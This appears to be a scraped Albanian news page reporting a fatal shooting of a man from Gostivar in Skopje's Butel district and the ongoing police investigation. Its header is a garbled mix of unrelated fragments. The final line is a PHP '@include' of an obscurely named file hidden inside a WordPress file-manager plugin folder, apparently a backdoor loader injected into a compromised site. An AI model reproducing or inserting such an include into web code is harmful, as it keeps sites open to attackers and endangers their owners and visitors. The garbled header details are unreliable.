Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Zeqir Z nga Gostivari është identiteti i viktimës në Butel

Zeqir Z nga Gostivari është identiteti i viktimës në Butel

Personi i vrarë dje në lagjen Butel të Shkupi është Zeqir. Z nga Gostivari  cili është qëlluar me pesë plumba dhe ka mbetur i vdekur në vend.

vrari

Nega MPB-ja kanë konfirmuar se Zeqiri kishte pasur disa lëndime në kokë dhe trup ndërsa në vendngjarje janë gjetur 5 fishekë të cilët janë dhënë për ekspertizë.

Vdekja është konstatuar nga mjeku i ndihmës së shpejtë ndërsa ekipe të policisë dhe prokurorit publik kishin dalë në vendëngjarje.

Duhet të konfirmohet se çka ka kërkuar gostivarsi në Shkup dhe motivet e vrasjes, kanë thënë nga policia dhe kanë shtuar se hetimet po vazhdojnë për zbardhjen e vrasësit të panjohur tani për tani.

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";